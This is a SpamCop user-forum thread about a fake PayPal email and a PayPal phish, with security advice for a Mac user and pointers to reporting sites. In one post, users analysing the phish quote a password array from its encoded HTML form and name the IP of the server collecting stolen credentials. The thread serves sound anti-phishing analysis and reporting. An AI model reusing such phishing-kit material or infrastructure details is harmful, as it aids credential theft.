Jump to content

Taking it to the next level.


johnwade
 Share

Recommended Posts

Hi

I may not be entirely clear as to exactly what spamcop does and how effective it is. From what I can tell it tries to determine where the email originates from, then determines what the complaints dept. email is and sends a report.

Is there more to it than that because I don't think that's going to have much of an impact based on where it appears the reports are being sent in the case of the emails I'm getting from one fellow in particular.

I received an email today allegedly from PayPal (I called and it's not from them) addressed to the email address of mine that the spammer is sending my email to. (I've unsubscribed, found alternate emails of his and sent polite letters and even left messages on his cell phone as I found the number and at a place he works).

The email subject line: Auto Response - Reply PayPal Email (KMM83576559V19825L0KM) :ppNA

The email content:

Hello John Wade,

We want to help you but we're not able to respond directly to emails

sent to this address.

If you have a question about your account, please contact us through our

website. Here's how:

1. Go to the PayPal website and log in to your account.

2. Click "Contact Us" at the bottom of any page.

3. Click "Contact Customer Service," and ask your question.

One of our Customer Service agents will reply to your question.

We value your business and want to provide you with the best customer

care.

Thanks,

PayPal

This email is sent to you by the contracting entity to your User

Agreement, either PayPal Inc, PayPal Pte. Ltd or PayPal (Europe) S.à

r.l. & Cie, S.C.A. Société en Commandite par Actions, Registered Office:

5th Floor 22-24 Boulevard Royal L-2449, Luxembourg RCS Luxembourg B 118

349.

Unless they have something planted on my computer to record key strokes I can't imagine how this would benefit them but I thought I'd seek opinions on this forum.

I'm interested in recommendations as to what I can do to maximize my security. I'm using a Mac Laptop, iphone, and iPad and I'm using NetBarrier and VirusBarrier by Intego.

I'm also interested in what I can do to take it to the next level to shut this particular spammer down.

Link to comment
Share on other sites

I may not be entirely clear as to exactly what spamcop does and how effective it is. From what I can tell it tries to determine where the email originates from, then determines what the complaints dept. email is and sends a report.

Is there more to it than that because I don't think that's going to have much of an impact based on where it appears the reports are being sent in the case of the emails I'm getting from one fellow in particular.

Actually, what you don't see is that SpamCop takes the information from users' reports and its own resources and uses them to update a real-time DNS block list (the SpamCop Blocking List). This list is used by many mail providers all over the world as one means to detect incoming spam. So, even if your individual reports don't accomplish much for you personally, they do eventually make their way to the SCBL where they can be of help to everyone (or at least to customers of mail services who use SCBL for spam detection).

While occasionally mail admins do use SC reports to fix their spam problems, many more services don't have the abuse-desk resources, don't care, don't know how, or are just flat crooked. So, the individual reports won't change their behavior, but perhaps landing on the SCBL will be more of a goad to them.

I received an email today allegedly from PayPal (I called and it's not from them) addressed to the email address of mine that the spammer is sending my email to. (I've unsubscribed, found alternate emails of his and sent polite letters and even left messages on his cell phone as I found the number and at a place he works).
Well, to me this seems to be a slam-dunk: if it didn't come from PayPal (as it appears to claim), it is very likely to be a "phish" message (i.e., an attempt to get you to surrender your PayPal credentials). The mail headers of these messages could prove pretty positively whether or not they come from PayPal. Possibly they have given you a web link in the message that's supposed to go to the PayPal website but instead goes to a site under the spammer's control.

Whatever the case, the best response to this sort of stuff is to ignore it -- do not attempt to answer, do not use any of its links, etc. You can report it thru SpamCop if you like (and if you are sure it is spam).

I'm interested in recommendations as to what I can do to maximize my security. I'm using a Mac Laptop, iphone, and iPad and I'm using NetBarrier and VirusBarrier by Intego.
Security isn't necessarily something you buy and install -- it is something that you DO. The extra software won't help you if you consistently download and run untrusted files, run public servers on your machine (e.g., FTP or web), or hand out passwords indiscriminately. Yes, a handgun or a can of mace might help you if you find yourself in a bad neighborhood, but the best might be just to stay out of the bad neighborhood altogether.

I am also a Mac user, but I haven't really installed much in the way of add-on security, Macs are pretty well-protected out of the box as long as you don't kneecap them yourself (e.g., by turning off the firewall, installing rogue software, opening random unneeded internet servers, or handing out info to strangers). I have WiFi, and I have set it up for MAC-based access (that's MAC as in Ethernet address, not MAC as in Apple Computer), which pretty much makes my WiFi inaccessible to any device except for those known to me. Most modern WiFi routers have this feature.

I'm also interested in what I can do to take it to the next level to shut this particular spammer down.
Unless you are the police, or a major shareholder in the network provider whose resources the spammer is using, you aren't in much of a position to deal with a recalcitrant network provider. However, you can just keep reporting them and (one hopes) keep them on the blocking list (which does eventually give them a clue).

-- rick

(p.s., these ravings are my own and not official statements from SpamCop; this is, as you can see, a user-to-user forum by and large.)

Link to comment
Share on other sites

Hi John,

Yes, you missed the main point of SpamCop - user reports and spamtrap hits on the source of the spam supporting the blocklist of such addresses while (and only while) they are active and a major nuisance. It is SC's niche amongst the public blocklist provisioners. Reports to responsible abuse addresses are very nice and have the potential to dismantle whole botnets or get persistent individuals "de-hosted" but, alas, that would require that the majority of ISPs behind the abuse addresses be responsive and good at enforcing their own AUPs/TOSs/CRAs which is possibly not the case for all sorts of reasons (including dedication to their own "in-house" anti-spam solutions).

PayPal have their own anti-spoof measures and reporting addresses (spoof[at]paypal.com or a regional equivalent), not sure how effective that is these days but surely over-worked since they insist on sending "policy updates" and the like when user accounts have been set up to decline those (which may be an option either silently removed or hard to find in current accounts? not sure) - and although they have advice pages with notes and illustrations on how to "Identify a hoax" (which are tucked away in the secure member pages and very basic) they undermine confidence when they will sometimes repudiate what turn out to be legitimate contacts from some part of their enterprise which (I guess) their "spoof[at]" address hasn't heard of before, going by my own past experiences.

Now it rather looks to me like you are wanting to talk about a genuine PayPal auto-response - though they deny it and though it may not have been you that initiated it (through some e-mail or website action) on behalf of your account. If you want to talk about spam/phishes, actual or suspected, here then use a tracking URL as is conspicuously requested in our FAQs. The "trick" to that, when you're discussing a suspect spam/phish, is to CANCEL the offer to send the report after the submission has been parsed. You may have to revert to the webform SC submission of the item to allow you to munge any personal identification you don't want to be public but which SC perhaps does not munge for you - but that is still quicker than trying to second-guess the information staff or members here need to see in order to help - and that data in the tracking URL is one step removed from the point of discussion so inherently a little more secure.

As and when you get the chance, continue to read the FAQs and research previous discussions - the knowledge is cumulative (and sometimes need to be re-read in the light of subsequent understanding) but tends to answer questions you may not even have thought of yet. Yes, you need to be dedicated to go that far but you seem to be sufficiently interested.

[above posted before seeing Rick's response but leaving it stand since it reinforces/complements some of his]

Link to comment
Share on other sites

The thing about the email not really from paypal that got my spidey sense tingling is there were no links, no attempts to get any information from me directly or indirectly. Why send it? Made me wonder if there was some way to monitor keystrokes.

Thanks for the info about DNS block list. That makes me feel a little bit better about taking the time to forward the emails.

As an aside once just came back from my host:

This message has been rejected because it has

a potentially executable attachment "The BEST Squeeze Page Plugin EVER? (open now).eml"

This form of attachment has been used by

recent viruses or other malware.

If you meant to send this file then please

package it up as a zip file and resend it.

I'll read up on the MAC ethernet.

BTW, I check off the notify when their are replies but I don't seem to get them.

- John

Actually, what you don't see is that SpamCop takes the information from users' reports and its own resources and uses them to update a real-time DNS block list (the SpamCop Blocking List). This list is used by many mail providers all over the world as one means to detect incoming spam. So, even if your individual reports don't accomplish much for you personally, they do eventually make their way to the SCBL where they can be of help to everyone (or at least to customers of mail services who use SCBL for spam detection).

While occasionally mail admins do use SC reports to fix their spam problems, many more services don't have the abuse-desk resources, don't care, don't know how, or are just flat crooked. So, the individual reports won't change their behavior, but perhaps landing on the SCBL will be more of a goad to them.

Well, to me this seems to be a slam-dunk: if it didn't come from PayPal (as it appears to claim), it is very likely to be a "phish" message (i.e., an attempt to get you to surrender your PayPal credentials). The mail headers of these messages could prove pretty positively whether or not they come from PayPal. Possibly they have given you a web link in the message that's supposed to go to the PayPal website but instead goes to a site under the spammer's control.

Whatever the case, the best response to this sort of stuff is to ignore it -- do not attempt to answer, do not use any of its links, etc. You can report it thru SpamCop if you like (and if you are sure it is spam).

Security isn't necessarily something you buy and install -- it is something that you DO. The extra software won't help you if you consistently download and run untrusted files, run public servers on your machine (e.g., FTP or web), or hand out passwords indiscriminately. Yes, a handgun or a can of mace might help you if you find yourself in a bad neighborhood, but the best might be just to stay out of the bad neighborhood altogether.

I am also a Mac user, but I haven't really installed much in the way of add-on security, Macs are pretty well-protected out of the box as long as you don't kneecap them yourself (e.g., by turning off the firewall, installing rogue software, opening random unneeded internet servers, or handing out info to strangers). I have WiFi, and I have set it up for MAC-based access (that's MAC as in Ethernet address, not MAC as in Apple Computer), which pretty much makes my WiFi inaccessible to any device except for those known to me. Most modern WiFi routers have this feature.

Unless you are the police, or a major shareholder in the network provider whose resources the spammer is using, you aren't in much of a position to deal with a recalcitrant network provider. However, you can just keep reporting them and (one hopes) keep them on the blocking list (which does eventually give them a clue).

-- rick

(p.s., these ravings are my own and not official statements from SpamCop; this is, as you can see, a user-to-user forum by and large.)

Link to comment
Share on other sites

As it happens, I just received a PayPal phish mail. I got the tracking URL from the parse page and have pasted it below so people can get a look:

http://www.spamcop.net/sc?id=z5487293633z4...c21c40399e5e10z

This message pretends to be from PayPal but is not, as the headers indicate. The spammer attached a MIME-encoded HTML file, which is automatically VERY suspicious behavior (why bother encoding and attaching? WHy not just put it right into the body?). I only ever see this in spam or phishing mail (makes it less likely that the complete message will be scanned and possibly rejected by a spam filter).

Sure enough, the encoded HTML file contained a form with an action pointing to a website where my PayPal credentials would have been collected had I been unwise enough to submit them.

Pretty typical prank; nothing technically exotic, just a bit of "human engineering" aimed at the gullible.

-- rick

Link to comment
Share on other sites

1. Good work Rick. Interesting table in the encoded bits:

blacklist_pwds=["password","69696969","11223344","12121212","12312312","12341234","13131313",
"18675309","23232323","access14","americanidol","baseball","baseball1","bigdaddy","blink182","butthead",
"cocacola","computer","corvette","cowboys","danielle","dolphins","einstein","firebird","football","football1",
"Iloveyou","iloveyou1","internet","jennifer","jordan23","liverpool","liverpool1","marlboro","maverick","melanie",
"michelle","midnight","mistress","mountain","myspace1","Password","password1","princess1","qwertyui",
"redwings","rush2112","samantha","scorpion","slipknot1","srinivas","startrek","starwars","sunshine","superman"
,"superman1","swimming","trustno1","victoria","whatever"]

Thank goodness my password "password2" passes muster, eh? And danielle, jennifer, melanie, michelle, samantha and victoria have been loved to death. A bit like Windows™ itself although Windows 8 seems to be rectifying that situation very nicely.

So, if I'm reading it rightly, info collected by that one gets sent to a softlayer-hosted site (173.192.132.178 - I'm not quoting the resolved name and the PTR record doesn't point to it), domain created 01-Aug-2007 through DomainsByProxy.com, network abuse address abuse[at]cimediagroup.com, organisation abuse address abuse[at]softlayer.com - "outed" by phishtank operator "cybercrime " on Feb 17th 2013 11:41 PM (UTC) and the site is still running, not abandoned, still apparently harmless and responding normally to search engines (and presumably only works its cybercrime magic when hit by an incoming fake PayPal form).

A clever faux PayPal site (or intercept) should be readily detectable through its security certificate fingerprint not matching the real deal one fetched independently (https://www.grc.com/fingerprints.htm) but I'm not sure that comes into play with your example Rick. The phishtank sighting sort of infers it might, if "cybercrime" saw the same but the PayPal site he/they link to is the real one which confuses me.

Yeah, I've all seen the HTML attachments before, been around for a while, very worried when first sighted because of the following. Pretty-well bulletproof when it comes to AV fingerprints but "behavior" might trigger some when accessed, otherwise relying on browser internet security settings which might not be enough. The decoded HTML file in your example is currently recognized by only two AVs in the VirusTotal battery:

https://www.virustotal.com/en/file/2a06459533f82e672ad51d79c94deb5c6ad8d2cdcef939757b880f0b8af936da/analysis/1365558646/

Those two also detect it in the encoded (Base64) state inside mime boundary

https://www.virustotal.com/en/file/5993ed7393651403e0eae2dccf061678861c41d30836b9416c9837ddcef419d1/analysis/1365558977/

PayPal customers simply have to remember PayPal (says) they NEVER send attachments. Other service providers do, which is one cornerstone of the human engineering construct. I don't think victims of this one, especially infrequent PayPal users, are especially/necessarily gullible, given the generalised chaos and abundant distractions.

2. Don't know about the O/P's PayPal example though, no attachments reported for that one, no links even, still think it could be a genuine part of the PayPal Auto Response system, albeit possibly triggered by some sort of hack attempt/third party activity, might have known more with a tracking URL, never will without, IMO. Not a good thing to be seeing anyway, if the O/P is sure he did nothing to trigger it himself (he might simply read it as, effectively, an alert then, alarming enough, but not a phish as such if it is genuine but he didn't cause it).

BUT yes, use in conjunction with a key-logger would be possible and scans should be made with your regular AV and anything else you can throw at the job (a specialised anti-malware scan might find things AV won't, and a second AV might [does sometimes] find things the first doesn't but you may be limited to web-based scans for the second to avoid clashes/intrusive installations). Include the Kapersky Anti-rootkit utility TDSSKiller as a free tool for a one-off scan:

http://support.kaspersky.com/5350?el=88446

Since nothing short of re-formatting the hard-drive(s) - not even then sometimes - and rebuilding the operating system gives complete assurance, the next step well short of that point might be running MalwareBytes and hijackthis under the tutelage of one of the volunteer guides at bleepingcomputer.com or similar. I wouldn't be going that far without seeing some evidence of exploit, myself, but yes, some of these sods of cybercriminals are reputed to be very patient sometimes and wait a while before using gathered data.

It can be easy to go overboard on this - some folk allegedly wear out hard-drives with too-frequent full-system scans. That's the wrong pathway. Even frequent recourse to last known good backups may be excessive (not to mention a pain to then get up to date, safely) but many people go that way, probably because they deem their browsing/net use unavoidably and exceptionally risky and aren't using virtual PCs for some excellent reason. Can only repeat the words on the cover of Hitchhikers Guide to the Galaxy - "Don't Panic."

Just my opinion.

Link to comment
Share on other sites

Wow, how did this guy know all my passwords?...
:lol:

Yes, your attachment is just the stand-alone form, with a local address, nothing to indicate actual PayPal connection except for the externally-linked graphics (at least one of which is a broken link under some security settings) and some information pages. The wording is clumsy in places, some of the controls are French, others English, layout is partly broken - barely useable for the PayPal details - for some browsers (for all of mine, anyway) and form completion and sending won't function at all without browser/scri_pt security settings relaxed and then shows the true destination for the fatal "Record" button (if scroll-over reveal is enabled).

Your characteristion "Pretty typical prank; nothing technically exotic, just a bit of "human engineering" aimed at the gullible." makes a lot more sense now. But it could easily have been made totally slick. Not sure we can trust in the typical scammer incompetence for all of this type.

Interesting and appropriately cautionary is my take on it, even if not especially dangerous in this instance. Phishtank got it slightly wrong, showing the PayPal landing page in connection with this one - or the same (external) collection point is used by several gangs/individuals using different methods. Not sure how that would work or even if it works at all but would like to imagine them competing for any spoils.

Wouldn't try looking more closely with a real Windows machine, just in case (and with my limited understanding). One day some budding "Artemus Fowl" is going to come on the scene, surely. Logic says we can't forever overestimate them. But no criminal mastermind this time, I think and a few tools mentioned in previous post that may help when one does come along.

Steve

Link to comment
Share on other sites

It's not all that scary; I think the lesson here is that messages like the one I reported on are not harmful at all, as long as you do not try to respond to them directly in any way. If you are told you have a problem with your PayPal account, you should contact PayPal directly (using a URL that you type in yourself) and then check on it there. Or, call them on the old fashioned telephone using a number you find yourself.

-- rick

Link to comment
Share on other sites

  • 2 weeks later...

johnwade, my guess is that some of your security software or the spammer's ineptitude caused there to be no HTML attachment or phishing link in the email when you opened it. That looks like a standard phishing email, which would either include an HTML form that submits data to some non-PayPal server, or a link to a hosted phishing site with a similar form.

Whereas SpamCop is designed to attack the source of spam, PhishTank is designed to expose phishing URLs. I highly suggest submitting phishing emails to them, to help out everyone else. They don't actually send reports like SpamCop does, so you don't have to worry about passing personal information back to the malicious sender, it just flags the site as being bad.

Usually the destination that the HTML form submits to will then forward you to the actual site that's being phished (i.e. www.hackersite.com/stealyourdata.php -> www.paypal.com), which causes PhishTank to display the actual PayPal site as the screenshot when sending them the form submission URL. While this is technically not exactly accurate, it does make the URL appear to be a standard phishing site when others are examining and voting on it (which is helpful because some people there refuse to mark anything as a phish if it doesn't have explicit logon fields).

Link to comment
Share on other sites

<snip>

Whereas SpamCop is designed to attack the source of spam, PhishTank is designed to expose phishing URLs. I highly suggest submitting phishing emails to them, to help out everyone else.

<snip>

...FWIW, I have SpamCop send mine to reportphishing[at]antiphishing.org (I added this address to http://www.spamcop.net/mcgi?action=showadvanced, Preferences > Report Handling Options).
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

×
×
  • Create New...